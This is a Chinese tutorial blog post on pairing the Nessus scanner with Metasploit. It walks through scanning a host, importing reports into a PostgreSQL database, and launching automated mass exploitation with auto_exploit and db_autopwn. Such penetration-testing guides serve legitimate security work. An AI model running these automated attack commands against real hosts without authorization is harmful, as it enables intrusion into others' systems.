• metasploit nessus & db_autopwn


    nessus官网:https://www.tenable.com/products/nessus-vulnerability-scanner

    下载地址:https://www.tenable.com/products/nessus/select-your-operating-system

     安装

    启动nessusd服务:sudo service nessusd start

    访问:https://localhost:8834

    设置登录的用户名/密码

    此时会提示注册激活码,地址:http://www.tenable.com/products/nessus-home

    从邮箱中复制粘贴激活码,继续。

     登录

    msf > load nessus

    msf > nessus_connect nessus:nessus@192.168.1.100  连接上nessus(nessus的用户名和密码是安装过程中设置的,这里我设置的都是nessus)

    msf > nessus_user_add <username> <password>   添加一个nessus用户 

    把test用户提升为admin
    msf > nessus_admin

    msf > nessus_user_list 查看用户列表
    msf > nessus_policy_list 选择一种扫描规则

    ID Name Comments
    — —- ——–
    -1 Prepare for PCI-DSS audits (section 11.2.2)
    -2 Web App Tests
    -3 External Network Scan
    -4 Internal Network Scan
    msf > nessus_scan_new

    [*] Usage:
    [*] nessus_scan_new <policy id> <scan name> <targets>
    [*] use nessus_policy_list to list all available policies

    msf > nessus_scan_new -2 testabc 192.168.1.100 新建扫描任务
    msf > nessus_scan_status 查看扫描状态
    msf > nessus_report_list 查看扫描报告列表
    msf > nessus_report_list uid 查询指定扫描报告详细
    msf > nessus_report_host_ports IP uid 列出指定IP的扫描结果
    msf > nessus_report_host_detail IP 端口 tcp uid查看指定IP地址指定端口扫描详细结果
    msf > nessus_report_get 导入一个扫描报告
    msf > hosts -c address,os_name,os_flavor,os_sp,vulns 查看扫描结果
    msf > vulns 查看扫描到的主机漏洞

    用auto_exploit进行批量溢出
    开启postgresql 创建一个数据库
    root@bt:# service postgresql start
    root@bt:~# psql -U postgres -h localhost
    输入 “help” 来获取帮助信息.
    postgres=# CREATE DATABASE testabc;
    CREATE DATABASE
    postgres=#

    msf > db_status msf连接postgresql
    msf > db_connect postgres:123456@localhost:5432/testabc
    msf > nessus_report_list 查看nessus报告 并导入一个报告
    msf > load auto_exploit 加载auto_exploit,执行vuln_exploit溢出

    msf > load db_autopwn

    msf > db_autopwn -t -p -e(自动工具所有的ip)

    msf > db_autopwn -t -p -I ip -e(攻击指定的ip主机) 

    参考链接:

      http://darkoperator.squarespace.com/blog/?currentPage=10

  • 相关阅读:
    ACL2016信息抽取与知识图谱相关论文掠影
    决策树之信息与熵的计算
    从零开始一个http服务器(六)-多路复用和压力测试
    从零开始一个http服务器(三)-返回response 构造
    从零开始一个http服务器(二)-请求request解析
    从零开始一个http服务器(一)-开始
    从零开始一个http服务器(五)-模拟cgi
    从零开始一个http服务器(四)-动态返回
    拼音转汉字
    24点牌 递归算法
  • 原文地址:https://www.cnblogs.com/ssooking/p/6076864.html
Copyright © 2020-2023  润新知